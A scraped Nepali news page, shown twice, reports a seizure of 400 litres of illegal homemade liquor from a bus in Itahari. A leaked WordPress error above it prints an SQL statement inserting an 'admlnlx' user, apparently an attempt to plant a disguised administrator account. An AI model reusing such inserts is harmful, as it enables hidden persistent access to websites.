WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXEZO3lNp9zBh88oUBSLFk0iTCRHJl0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 18:36:00', '', 'admlnlx', 'admlnlx')
इटहरी, मंसिर १९- पूर्वीे नेपाल काँकडभिट्टाबाट विराटनगरका लागि आएको को १ ख ११३२ नं को यात्रुवाहक बस आज बिहान इटहरी चोकमा जाँच गर्ने क्रममा ४०० लि अवैध घरेलु मदिरा बरामद भएको छ ।
इलाका प्रहरी कार्यालय इटहरीले पूर्वबाट आएका सवारी साधन जाँच गर्ने क्रममा बसभित्र उक्त परिमाणको मदिरा बरामद गरेको प्रहरी नायब उपरीक्षक नरेशराज सुवेदीले जानकारी दिनुभयो ।
बरामद भएको मदिरा कसले ल्याएको हो भन्ने यकिन नभएको र बसका कर्मचारीले पनि कसले मदिरा ल्याएका हुन् भनेर नभनेको प्रहरीले बताएको छ । मदिरा इलाका प्रहरी कार्यालय इटहरीमा राखिएको छ । रासस
इटहरी, मंसिर १९- पूर्वीे नेपाल काँकडभिट्टाबाट विराटनगरका लागि आएको को १ ख ११३२ नं को यात्रुवाहक बस आज बिहान इटहरी चोकमा जाँच गर्ने क्रममा ४०० लि अवैध घरेलु मदिरा बरामद भएको छ ।
इलाका प्रहरी कार्यालय इटहरीले पूर्वबाट आएका सवारी साधन जाँच गर्ने क्रममा बसभित्र उक्त परिमाणको मदिरा बरामद गरेको प्रहरी नायब उपरीक्षक नरेशराज सुवेदीले जानकारी दिनुभयो ।
बरामद भएको मदिरा कसले ल्याएको हो भन्ने यकिन नभएको र बसका कर्मचारीले पनि कसले मदिरा ल्याएका हुन् भनेर नभनेको प्रहरीले बताएको छ । मदिरा इलाका प्रहरी कार्यालय इटहरीमा राखिएको छ । – रासस